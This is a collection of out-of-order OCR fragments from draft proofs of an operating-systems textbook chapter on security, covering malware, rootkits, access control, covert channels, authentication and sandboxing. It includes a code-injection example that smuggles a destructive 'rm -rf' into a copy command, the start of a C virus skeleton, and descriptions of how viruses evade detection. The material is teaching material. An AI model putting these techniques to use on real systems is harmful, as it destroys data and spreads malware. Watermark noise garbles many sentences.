173. ne banking program such as Quicken installed If so the Trojan horse directs the program to transfer some money from the victim s account to a dummy account preferably in a far away country for collection in cash later In the second scam the Trojan horse first turns off the modem s sound then dials a 900 pay number again preferably in a far away country such as Mol dova part of the former Soviet Union If the user was online when the Trojan horse was started then the 900 phone number in Moldova needs to be a very expensive Internet provider so the user will not notice and perhaps stay online for hours Neither of these techniques is hypothetical both have happened and are reported by Denning 1999 In the latter one 800 000 minutes of connect time to Moldova were run up before the U S Federal Trade Commission managed to get the plug pulled and filed suit against three people on Long Island They eventually agreed to return 2 74 million to 38 000 victims 9 7 2 Viruses It is hard to open a newspaper these days without reading about another com puter virus or worm attacking the world s computers They are clearly a major security problem for individuals and companies alike In this section we will examine viruses after it we turn to worms I was somewhat hesitant to write this section in so much detail lest it give some people bad ideas but existing books give far more detail and even include real code e g Ludwig
174. nerates a long random number the check field to go with it A slot in the server s file table is reserved for the object and the check field is stored there along with the addresses of the disk blocks etc In PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This eat is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 9 3 storage in a retrievaPs Gdns GAANA Eih hor by any means electronic mechanical photocopying recording or likewise UNIX terms the check field is stored on the server in the i node It is not sent back to the user and never put on the network The server then generates and returns a capability to the user of the form shown in Fig 9 10 aes el Figure 9 10 A cryptographically protected capability The capability returned to the user contains the server s identifier the object number the index into the server s tables essentially the i node number and the rights stored as a bitmap For a newly created object all the rights bits are turned on The last field consists of the concatenation of the object rights and check field run through a cryptographically secure one way function f of the kind we discussed earlier When the user wishes to access the object it sends the capability to the ser
175. nical photocopying recording or likewise software or Web page that people voluntarily download When the free program is started it calls a function that writes the malware to disk as an executable program and starts it The malware can then do whatever damage it was designed for such as deleting modifying or encrypting files It can also search for credit card numbers passwords and other useful data and send them back to Mal over the Internet More likely it attaches itself to some IP port and waits there for directions making the machine a zombie ready to send spam or do whatever its remote master wishes Usually the malware will also invoke the commands necessary to make sure the malware is restarted whenever the ma chine is rebooted The beauty of the Trojan horse attack is that it does not require the author of the Trojan horse to break into the victim s computer The victim does all the work There are also other ways to trick the victim into executing the Trojan horse program For example many UNIX users have an environment variable PATH which controls which directories are searched for a command It can be viewed by typing the following command to the shell echo PATH A potential setting for the user ast on a particular system might consist of the fol lowing directories usr ast bin usr local bin usr bin bin usr bin X 1 1 usr ucb usr man usr java bin usr java lib usr local man usr openwin man O
176. nto infect to generate a random number and just return in most cases without doing anything In say one call out of 128 infection would take place thereby reducing the chances of early detection before the virus has had a good chance to spread Biological viruses have the same property those that kill their victims quickly do not spread nearly as fast as those that produce a slow lingering death giving the victims plenty of chance to spread the virus An alternative design would be to have a higher infection rate say 25 but a cutoff on the number of files infected at once to reduce disk activity and thus be less conspicu ous Second infect could check to see if the file is already infected Infecting the PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 7 storage in a retrieval system orMlanbrWSAIBdn any form or by any means electronic mechanical photocopying recording or likewise include lt sys types h gt standard POSIX headers include lt sys stat h gt include lt dirent h gt include lt fcntl h gt include lt unistd h gt struct stat sbuf for Istat call to see if file is sym link search char dir_name
177. ny means elecfrddi amp P 9 mechanical photocopying recording or likewise code outside its code sandbox or reference data outside its data sandbox The rea son for having two sandboxes is to prevent an applet from modifying its code dur ing execution to get around these restrictions By preventing all stores into the code sandbox we eliminate the danger of self modifying code As long as an applet is confined this way it cannot damage the browser or other applets plant viruses in memory or otherwise do any damage to memory As soon as an applet is loaded it is relocated to begin at the start of its sand box Then checks are made to see if code and data references are confined to the appropriate sandbox In the discussion below we will just look at code references i e JMP and CALL instructions but the same story holds for data references as well Static JMP instructions that use direct addressing are easy to check does the target address land within the boundaries of the code sandbox Similarly relative JMPs are also easy to check If the applet has code that tries to leave the code sandbox it is rejected and not executed Similarly attempts to touch data outside the data sandbox cause the applet to be rejected The hard part is dynamic JMPs Most machines have an instruction in which the address to jump to is computed at run time put in a register and then jumped to indirectly for example by JMP R1 to jump to the address held
178. ocopying recording or likewise 15 The server will verify that the capability is valid and then generate a weaker capabil ity This is legal After all the friend can just give away the capability it already has Giving it the power to give away something even weaker is not a security threat If you have the ability to give away say read write power giving away read only power is not a problem 16 No That would be writing down which violates the property 17 No That would be reading up which violates the simple security property 18 A process writing to another process is similar to a process writing to a file Conse quently the property would have to hold A process could write up but not write down Process B could send to C D and E but not to A 19 In the original photo the R G and B axes each allow discrete integral values from 0 to 255 inclusive This means that there are 2 valid points in color space that a pixel can occupy When bit is taken away for the covert channel only the even values are allowed assuming the secret bit is replaced by a O everywhere Thus as much of the space is covered but the color resolution is only half as good In total only 1 8 of the colors can be represented The disallowed colors are mapped onto the adjacent color all of whose values are even numbers for example the colors 201 43 97 201 42 97 200 43 96 and 200 42 97 now all map onto the point 200 42 96
179. of y is far more diffi cult 6 A and B pick random keys Ka and Kb and send them to C encrypted with C s public key C picks a random key K and sends it to A encrypted using Ka and to B encrypted using Kb 7 One way to sign a document would be for the smart card to read in the document make a hash of it and then encrypt the hash with the user s private key stored in the card The encrypted hash would be output to the Internet cafe computer but the secret key would never leave the smart card so the scheme is secure PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction storage ina LEANE QEEGRLANS oh Ray y means electrenidyt 9 mechanical photocopying recording or likewise 8 It is just entered into the matrix twice In the example given in the text printer is in two domains simultaneously There is no problem here 9 Full protection matrix 1000 x 100 100 000 units of space ACL 10 x 100 x 2 1 objects accessible in all domains 100 entries in each ACL 100x2x2 10 objects accessible in two domains 2 entries in each ACL 890x1x2 89 objects accessible in 1 domain 1 entry in each ACL 4 180 units of space The space needed for the storing a
180. oint the machine has become a zombie 9 6 4 Integer Overflow Attacks Computers do integer arithmetic on fixed length numbers usually 8 16 32 or 64 bits long If the sum of two numbers to be added or multiplied exceeds the maximum integer that can be represented an overflow occurs C programs do not catch this error they just store and use the incorrect value In particular if the variables are signed integers then the result of adding or multiplying two positive integers may be stored as a negative integer If the variables are unsigned the results will be positive but may wrap around For example consider two un signed 16 bit integers each containing the value 40 000 If they are multiplied together and the result stored in another unsigned 16 bit integer the apparent pro duct is 4096 This ability to cause undetected numerical overflows can be turned into an attack One way to do this is to feed a program two valid but large parameters in the knowledge that they will be added or multiplied and result in an overflow For example some graphics programs have command line parameters giving the height and width of an image file for example the size to which an input image is PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission sho
181. omain to access an object are revoked 7 new access rights are granted to all domains to access an object 8 access rights to access an object are revoked from all domains SOLUTIONS TO CHAPTER 9 PROBLEMS the time has come the walrus said to talk of many things of ships and shoes and sealing wax of cabbages and kings of why the sea is boiling hot and whether pigs have wings but wait a bit the oysters cried before we have our chat for some of us are out of breath and all of us are fat no hurry said the carpenter they thanked him much for that From Through the looking glass Tweedledum and Tweedledee 2 The constraint is that no two cells contain the same two letters otherwise decryption would be ambiguous Thus each of the 676 matrix elements contains a different one of the 676 digrams The number of different combinations is thus 676 This is a very big number 3 The number of permutations is n so this is the size of the key space One advantage is that the statistical attack based on properties of natural languages does not work because an E really does represent an E etc 4 The sender picks a random key and sends it to the trusted third party encrypted with the secret key that they share The trusted third party then decrypts the random key and recrypts it with the secret key it shares with the receiver This message is then sent to the receiver 5 A function like y x is easy to compute but taking the k th root
182. ome with uninstallers but they rarely work so in experienced users have no way to remove the spyware Fortunately a new indus try of antispyware software is being created and existing antivirus firms are get ting into the act Spyware should not be confused with adware in which legitimate but small software vendors offer two versions of their product a free one with ads and a paid one without ads These companies are very clear about the existence of the two versions and always offer users the option to upgrade to the paid version to get rid of the ads 9 7 5 Rootkits A rootkit is a program or set of programs and files that attempts to conceal its existence even in the face of determined efforts by the owner of the infected machine to locate and remove it Usually the rootkit contains some malware that is being hidden as well Rootkits can be installed by any of the methods discussed so far included viruses worms and spyware as well as by other ways one of which will be discussed later Types of Rootkits Let us now discuss the five kinds of rootkits that are currently possible from bottom to top In all cases the issue is where does the rootkit hide 1 Firmware rootkits In theory at least a rootkit could hide by re flashing the BIOS with a copy of itself in there Such a rootkit would get control whenever the machine was booted and also whenever a BIOS function was called If the rootkit encrypted itself after each use
183. ompany s future plans and then overwrite the President s files that contain corporate strategy Not all companies might be equally enthusiastic about this model The problem with the Bell La Padula model is that it was devised to keep secrets not guarantee the integrity of the data To guarantee the integrity of the data we need precisely the reverse properties Biba 1977 1 The simple integrity principle A process running at security level k can write only objects at its level or lower no write up 2 The integrity property A process running at security level k can read only objects at its level or higher no read down Together these properties ensure that the programmer can update the janitor s files with information acquired from the president but not vice versa Of course some organizations want both the Bell La Padula properties and the Biba PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publicatoni is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 9 3 storage in a retrievaPs nE Gdtensnhdsidokh aNy hor by any means electronic 27 mechanical photocopying recording or likewise properties but these are in direct conflict so they are hard to achieve simultane ously 9 3 8 Covert Chann
184. on by compressing the program and padding out the file to its original PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 8 storage in a retrieval system or lPEYSHINSESin any form or by any means electronic 7 mechanical photocopying recording or likewise length To make this scheme work the virus must contain both compression and decompression procedures as shown in Fig 9 32 c File is longer Original size Original size Original size GAA Encrypted Key Compressed executable program Executable Executable program program Compressed executable program c Decryptor Compressed executable program d Header e a b Figure 9 32 a A program b An infected program c A compressed infect ed program d An encrypted virus e A compressed virus with encrypted compression code Another way for the virus to try to escape detection is to make sure its representa tion on the disk does not look like its representation in the antivirus software s database One way to achieve this goal is to encrypt itself with a different key for each file infected Before making a new copy the virus generate
185. oot time Even nicer drivers run in kernel mode and after a driver is loaded it is called giving the virus a chance to capture the system call trap vector This fact alone is actually a strong argument for running the device drivers as user mode programs if they get infected they cannot do nearly as much damage as kernel mode drivers PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 7 storage in a retrieval system orMlanbrWSAIBdn any form or by any means electronic mechanical photocopying recording or likewise Operating system Operating system Sys call traps Boce Clock vector A a Operating system Sys call traps Clock vector w Sys call traps Clock vector c Figure 9 29 a After the virus has captured all the interrupt and trap vectors b After the operating system has retaken the printer interrupt vector c After the virus has noticed the loss of the printer interrupt vector and recaptured it Macro Viruses Many programs such as Word and Excel allow users to write macros to group several commands that can later be executed with a single keystroke Mac ros can also be attached to menu it
186. or distribution Let us start with the classical one Virgil writes his virus inserts it into some program he has written or stolen and starts distributing the program for example by putting it on a shareware Web site PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any_prohibited reproduction SEC 9 7 storage in a retrieval system orMla nbrWSAIBAn any form or by any means electronic mechanical photocopying recording or likewise Eventually somebody downloads the program and runs it At this point there are several options To start with the virus probably infects more files on the hard disk just in case the victim decides to share some of these with a friend later It can also try to infect the boot sector of the hard disk Once the boot sector is infected it is easy to start a kernel mode memory resident virus on subsequent boots Nowadays other options are also available to Virgil The virus can be written to check if the infected machine is on a LAN something that is very likely on a machine belonging to a company or university The virus can then start infecting unprotected files on the servers connected to this LAN This infection will not extend to protected files but
187. or individual users Many systems support the concept of a group of users Groups have names and can be included in ACLs Two variations on the semantics of groups are possible In some systems each process has a user ID UID and group ID GID In such systems an ACL entry contains entries of the form UID1 GID1 rights1 UID2 GID2 rights2 Under these conditions when a request is made to access an object a check is made using the caller s UID and GID If they are present in the ACL the rights listed are available If the UID GID combination is not in the list the access is not permitted Using groups this way effectively introduces the concept of a role Consider a computer installation in which Tana is system administrator and thus in the group sysadm However suppose that the company also has some clubs for em ployees and Tana is a member of the pigeon fanciers club Club members belong to the group pigfan and have access to the company s computers for managing their pigeon database A portion of the ACL might be as shown in Fig 9 8 File Access control list Password tana sysadm RW Pigeon_data bill pigfan RW tana pigfan RW Figure 9 8 Two access control lists If Tana tries to access one of these files the result depends on which group she is currently logged in as When she logs in the system may ask her to choose which of her groups she is currently using or there might even be
188. ord file 1 The user s machine responds with P which can be computed locally from s which is typed in on the spot The server then computes f P and compares this to the value stored in the password file Po If the values match the login is permitted the integer is incremented to 2 and P overwrites P in the password file On the next login the server sends the user a 2 and the user s machine com putes P2 The server then computes f P2 and compares it to the entry in the password file If the values match the login is permitted the integer is incre mented to 3 and P overwrites P4 in the password file The property that makes this scheme work is that even though an intruder may capture P he has no way to compute P from it only P _ which has already been used and is now worth less When all n passwords have been used up the server is reinitialized with a new secret key Challenge Response Authentication A variation on the password idea is to have each new user provide a long list of questions and answers that are then stored on the server securely e g in encrypted form The questions should be chosen so that the user does not need to write them down Possible questions are 1 Who is Marjolein s sister 2 On what street was your elementary school 3 What did Mrs Woroboff teach At login the server asks one of them at random and checks the answer To make this scheme practical though many question an
189. osoft has been a big advocate of this concept and has developed a series of technologies to use it including Palladium NGSCB and BitLocker In its view the operating system controls the TPM to prevent unauthorized software from being run on the com puter Unauthorized software might be pirated software or just software the operating system does not authorize If the TPM is involved in the booting pro cess it might start only operating systems signed by a secret key placed inside the TPM by the manufacturer and disclosed only to selected operating system vendors for example Microsoft Thus the TPM could be used to limit users choices of software to those approved by the computer manufacturer The music and movie industries are also very keen on TPM as it could be used to prevent piracy of their content It could also open up new business models such as renting songs or movies for a specific period of time by refusing to decrypt them after the expiration date TPM has a variety of other uses that we do not have space to get into Interestingly enough the one thing TPM does not do is make computers more secure against external attacks What it is really focuses on is using cryptography to prevent users from doing anything not approved directly or indirectly by who ever controls the TPM If you would like to learn more about this subject the article on Trusted Computing in the Wikipedia is a good place to start 9 3 PROTECTION MECHANISMS
190. ot have Below we will give a few examples all of them have occurred repeatedly in the past Each one has a different flavor in terms of who is doing the attacking who is being attacked and what the attacker is trying to achieve 9 5 1 Logic Bombs In these times of massive outsourcing programmers often worry about their jobs Sometimes they even take steps to make their potential involuntary depar ture less painful For those who are inclined toward blackmail one strategy is to write a logic bomb This device is a piece of code written by one of a company s currently employed programmers and secretly inserted into the production sys tem As long as the programmer feeds it its daily password it does nothing However if the programmer is suddenly fired and physically removed from the premises without warning the next day or next week the logic bomb does not get fed its daily password so it goes off Many variants on this theme are also possible In one famous case the logic bomb checked the payroll If the person nel number of the programmer did not appear in it for two consecutive payroll periods it went off Spafford et al 1989 PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior
191. ources A detection program could put pressure on the TLB observe the performance and compare it to previously measured per formance on the bare hardware Another class of detection methods relates to timing especially of virtualized T O devices Suppose that it takes 100 clock cycles to read out some PCI device register on the real machine and this time is highly reproducible In a virtual environment the value of this register comes from memory and its read time depends on whether it is in the CPU s level 1 cache level 2 cache or actual RAM A detection program could easily force it to move back and forth between these states and measure the variability in read times Note that it is the variability that matters not the read time Another area that can be probed is the time it takes to execute privileged in structions especially those that require only a few clock cycles on the real hardware and hundreds or thousands of clock cycles when they must be emulated For example if reading out some protected CPU register takes 1 nsec on the real hardware there is no way a billion traps and emulations can be done in 1 sec Of course the hypervisor can cheat by reporting emulated time instead of real time on all system calls involving time The detector can bypass the emulated time by connecting to a remote machine or Website that provides an accurate time base Since the detector just needs to measure time intervals e g how long it takes to e
192. oved and an object is not problems arise ACLs do not suffer from this problem 9 3 4 Trusted systems One reads about viruses and worms and other problems in the news all the time A naive person might logically ask two questions concerning this state of affairs 1 Is it possible to build a secure computer system 2 Ifso why is it not done The answer to the first one is basically yes How to build a secure system has been known for decades MULTICS designed in the 1960s for example had security as one of its main goals and achieved that fairly well PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publicatoni is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 9 3 storage in a retrievaPs Sanke Gren snhdsiqokh aNy hor by any means electronic mechanical photocopying recording or likewise Why secure systems are not being built is more complicated but it comes down to two fundamental reasons First current systems are not secure but users are unwilling to throw them out If Microsoft were to announce that in addition to Windows it had a new product SecureOS that was guaranteed to be immune to viruses but did not run Windows applications it is far from certain that every per son and company would drop Wi
193. own and types a login name the system asks for a password If it is correct the user is logged in and a shell and possibly a GUI is started Figure 9 23 a Correct login screen b Phony login screen Now consider this scenario A malicious user Mal writes a program to display the screen of Fig 9 23 b It looks amazingly like the screen of Fig 9 23 a except that this is not the system login program running but a phony one written by Mal Mal now starts up his phony login program and walks away to watch the fun from a safe distance When a user sits down and types a login name the program responds by asking for a password and disabling echoing After the login name and password have been collected they are written away to a file and PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 5 storage in a retrieval systeHN SHDEHRnASBIDA Ie KAY form or by any means electronic 49 mechanical photocopying recording or likewise the phony login program sends a signal to kill its shell This action logs Mal out and triggers the real login program to start and display the prompt of Fig 9 23 a The user assumes that she made a typing error and just lo
194. pper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 36 storage in a retrieval system or 4HAsMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise login name password pairs is a process that lends itself very well to automation It will take many many tries to break in but if there is one thing that computers are very good at it is repeating the same sequence of commands over and over until the cows come home A cracker with a high speed cable or DSL connection can program the break in process to run all day long and just check back once in a while to see what has showed up In addition to telnet service many computers make a variety of other services available over the Internet Each of these is attached to one of the 65 536 ports associated with each IP address When a cracker has found a live IP address he will often run a port scan to see what is available there Some of the ports may yield additional options for breaking in A telnet or port scan attack is clearly better than a war dialer attack since it goes much faster no dialing time and is much cheaper no long distance tele phone charges but it only works for machines that are on the Internet and accept telnet connections Nevertheless many companies and nearly all universities do accept
195. que for doing this is called jailing and illustrated in Fig 9 35 Jailer Prisoner Sys Kernel Figure 9 35 The operation of a jail The newly acquired program is run as a process labeled prisoner in the fig ure The jailer is a trusted system process that monitors the behavior of the prisoner When a jailed process makes a system call instead of the system call being executed control is transferred to the jailer via a kernel trap and the sys tem call number and parameters passed to it The jailer then makes a decision about whether the system call should be allowed If the jailed process tries to open a network connection to a remote host unknown to the jailer for example the call can be refused and the prisoner killed If the system call is acceptable the jailer so informs the kernel which then carries it out In this way erroneous be PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 94 storage in a retrieval system or HAsMMREibY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise havior can be caught before it causes trouble Various implementations of jailin
196. r Then it crashed in a manner that forced a core dump or let itself be killed in a manner that forced a core dump Core dumps happen in the working directory which in this case is the cron daemon s directory Since the dumps are made by the system writing there was not prohibited by the protection system The memory image of the attacking program was structured to be a valid set of commands to the cron daemon which would then execute them as root The first one changed some program specified by the attacker into SETUID root and the second one ran the program At that point the attacker has an arbitrary program running as superuser This particular hole has since been plugged but it gives you the flavor of this type of attack PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 58 storage in a retrieval system or HAsMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise 9 7 MALWARE In ancient times say before 2000 bored but clever teenagers would some times fill their idle hours by writing malicious software that they would then re lease into the world for the heck of it This software which included Trojan
197. rage in a retrieval system or HAsMREIGY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise plays embedded in it Hamlet King Lear Macbeth The Merchant of Venice and Julius Caesar Together these plays total over 700 KB of text ae i ne DANTE S E Figure 9 16 a Three zebras and a tree b Three zebras a tree and the com plete text of five plays by William Shakespeare How does this covert channel work The original color image is 1024 x 768 pixels Each pixel consists of three 8 bit numbers one each for the red green and blue intensity of that pixel The pixel s color is formed by the linear superposition of the three colors The encoding method uses the low order bit of each RGB color value as a covert channel Thus each pixel has room for 3 bits of secret information one in the red value one in the green value and one in the blue value With an image of this size up to 1024 x 768 x 3 bits or 294 912 bytes of secret information can be stored in it The full text of the five plays and a short notice adds up to 734 891 bytes This was first compressed to about 274 KB using a standard compression algo rithm The compressed output was then encrypted and inserted into the low order bits of each color value As can be seen or actually cannot be seen the existence of the information is completely invisible It is equally invisible in the large full color version of the photo T
198. rce file ask for source file gets src get input from the keyboard strcat cmd src concatenate src after cp strcat cmd add a space to the end of cmd printf Please enter name of destination file ask for output file name gets dst get input from the keyboard strcat cmd dst complete the commands string system cmd execute the cp command Figure 9 26 Code that might lead to a code injection attack What the program does is ask for the names of the source and destination files build a command line using cp and then call system to execute it If the user types in abc and xyz respectively the command that is executed is cp abc xyz which indeed copies the file Unfortunately this code opens up a gigantic security hole using a technique PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any Bonibhee reproduction SEC 9 6 storage in a retrieval dyatath OLTENGMIGSID IA Bly fon or by any means electronic 5 mechanical photocopying recording or likewise called code injection Suppose that the user types in abc and xyz rm rf instead The command that is constructed and executed is now
199. re some string of high order bits For a 32 bit address space we could divide it up into 256 sandboxes on 16 MB boundaries so all addresses within a sandbox had a common upper 8 bits Equally well we could have 512 sandboxes on 8 MB boundaries with each sandbox having a 9 bit address prefix The sandbox size should be chosen to be large enough to hold the largest applet without wasting too much virtual address space Physical memory is not an issue if demand paging is present as it usually is Each applet is given two sandboxes one for the code and one for the data as illustrated in for the case of 16 sandboxes of 16 MB each Fig 9 37 a Virual address in MB 256 224 Rot Mon Reference MOV R1 S1 192 monitor for SHR 24 S1 checking CMP S1 S2 160 system TRAPNE JMP R1 128 96 Data 2 Applet 2 Code 2 per Data 1 0 Code 1 i ARplet 1 a b Figure 9 37 a Memory divided into 16 MB sandboxes b One way of checking an instruction for validity The basic idea behind a sandbox is to guarantee that an applet cannot jump to PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 98 storage in a retrieval system or 4HAsMREiBY in any form or by a
200. re test since you do not know who is behind it Code signing is based on public key cryptography A software vendor typi cally a software company generates a public key private key pair making the former public and zealously guarding the latter To sign a piece of software the vendor first computes a hash function of the code to get a 128 bit 160 bit or 256 bit number depending on whether MD5 SHA 1 or SHA 256 is used It then signs the hash value by encrypting it with its private key actually decrypting it using the notation of Fig 9 3 This signature accompanies the software wherever it goes When the user gets the software the hash function is applied to it and the result saved It then decrypts the accompanying signature using the vendor s pub lic key and compares what the vendor claims the hash function is with what it just computed itself If they agree the code is accepted as genuine Otherwise it is rejected as a forgery The mathematics involved makes it exceedingly difficult for anyone to tamper with the software in such a way as its hash function will match the hash function that is obtained by decrypting the genuine signature It is equally difficult to generate a new false signature that matches without having the private key The process of signing and verifying is illustrated in Fig 9 34 Web pages can contain code such as activeX controls but also code in vari ous scripting languages Often these are signed in w
201. release a virus on their machine To make matters worse the virus can then look for the user s address book and then mail itself to everyone in the address book usually with a Subject line that looks legitimate or interesting like Subject Change of plans Subject Re that last e mail Subject The dog died last night Subject am seriously ill Subject love you When the e mail arrives the receiver sees that the sender is a friend or colleague and thus does not suspect trouble Once the e mail has been opened it is too late The I LOVE YOU virus that spread around the world in June 2000 worked this PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 72 storage in a retrieval system or HASMIRSIBY in any form or by any means elecfrdiAP 9 mechanical photocopying recording or likewise way and did a billion dollars worth of damage Somewhat related to the actual spreading of active viruses is the spreading of virus technology There are groups of virus writers who actively communicate over the Internet and help each other develop new technology tools and viruses Most of these are probably hobbyists rather than career criminals but the effects c
202. ritten permission should be obtained from the publisher prior to any prohibited reproduction 68 storage in a retrieval system or 4HAsMREIBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise rest of itself as bad sectors A really aggressive virus could even just allocate nor mal disk space for the true boot sector and itself and update the disk s bitmap or free list accordingly Doing this requires an intimate knowledge of the operating system s internal data structures but Virgil had a good professor for his operating systems course and studied hard When the computer is booted the virus copies itself to RAM either at the top or down among the unused interrupt vectors At this point the machine is in ker nel mode with the MMU off no operating system and no antivirus program run ning Party time for viruses When it is ready it boots the operating system usu ally staying memory resident One problem however is how to get control again later The usual way is to exploit specific knowledge of how the operating system manages the interrupt vectors For example Windows does not overwrite all the interrupt vectors in one blow Instead it loads device drivers one at a time and each one captures the interrupt vector it needs This process can take a minute This design gives the virus the handle it needs It starts out by capturing all the interrupt vectors as shown in Fig 9 29 a As dr
203. rotected by Copyright and written permission should be obtained from the publisher prior to any_prohibited reproduction SEC 9 7 storage in a retrieval system orMlanbrWSAIBdn any form or by any means electronic mechanical photocopying recording or likewise these are in cahoots with or sometimes owned by the criminal The gold to be mined in these keystrokes consists of credit card numbers which can be used to buy goods from legitimate businesses Since the victims have no idea their credit card numbers have been stolen until they get their state ments at the end of the billing cycle the criminals can go on a spending spree for days possibly even weeks To guard against these attacks the credit card companies all use artificial in telligence software to detect peculiar spending patterns For example if a person who normally only uses his credit card in local stores suddenly orders a dozen expensive notebook computers to be delivered to an address in say Tajikistan a bell starts ringing at the credit card company and an employee typically calls the cardholder to politely inquire about the transaction Of course the criminals know about this software so they try to fine tune their spending habits to just stay under the radar The data collected by the keylogger can be combined with other data col lected by software installed on the zombie to allow the criminal to engage in a more extensive identity theft In this crime the crimin
204. s PC The e commerce site would not only use the smart card to authenticate the user in a more secure way than a password but could also deduct the purchase price from the smart card directly eliminating a great deal of the overhead and risk associated with using a credit card for online purchases Various authentication schemes can be used with a smart card A particularly simple challenge response works like this The server sends a 512 bit random number to the smart card which then adds the user s 512 bit password stored in the card s ROM to it The sum is then squared and the middle 512 bits are sent back to the server which knows the user s password and can compute whether the result is correct or not The sequence is shown in Fig 9 20 If a wiretapper sees both messages he will not be able to make much sense out of them and recording them for future use is pointless because on the next login a different 512 bit ran dom number will be sent Of course a much fancier algorithm than squaring can be used and always is One disadvantage of any fixed cryptographic protocol is that over the course of time it could be broken rendering the smart card useless One way to avoid this PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission s
205. s been sent As soon as the collaborator has read out the bit it flips F2 s lock status to tell the server it is ready for another bit and waits until FZ is flipped again to indicate that another bit is present in S Since timing is no longer involved this protocol is fully reliable even in a busy system and can proceed as fast as the two processes can get scheduled To get higher bandwidth why not use two files per bit time or make it a byte wide channel with eight signaling files SO through S7 Acquiring and releasing dedicated resources tape drives plotters etc can also be used for signaling The server acquires the resource to send a 1 and releases it to send a 0 In UNIX the server could create a file to indicate a 1 and remove it to indicate a 0 the collaborator could use the access system call to see if the file exists This call works even though the collaborator has no permission to use the file Unfortunately many other covert channels exist Lampson also mentioned a way of leaking information to the human owner of the server process Presumably the server process will be entitled to tell its owner how much work it did on behalf of the client so the client can be billed If the actual computing bill is say 100 and the client s income is 53 000 dollars the server could report the bill as 100 53 to its owner Just finding all the covert channels let alone blocking them is extremely dif ficult In practice there is l
206. s a random 32 bit encryption key for example by XORing the current time with the contents of say memory words 72 008 and 319 992 It then XORs its code with this key word by word to produce the encrypted virus stored in the infected file as illustrated in Fig 9 32 d The key is stored in the file For secrecy purposes putting the key in the file is not ideal but the goal here is to foil the virus scanner not prevent the dedicated scientists at the antivirus lab from reverse engineering the code Of course to run the virus has to first decrypt itself so it needs a decrypting pro cedure in the file as well This scheme is still not perfect because the compression decompression en cryption and decryption procedures are the same in all copies so the antivirus program can just use them as the virus signature to scan for Hiding the compres sion decompression and encryption procedures is easy they are just encrypted along with the rest of the virus as shown in Fig 9 32 e The decryption code cannot be encrypted however It has to actually execute on the hardware to decrypt the rest of the virus so it must be present in plaintext form Antivirus pro grams know this so they hunt for the decryption procedure However Virgil enjoys having the last word so he proceeds as follows PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle Ri
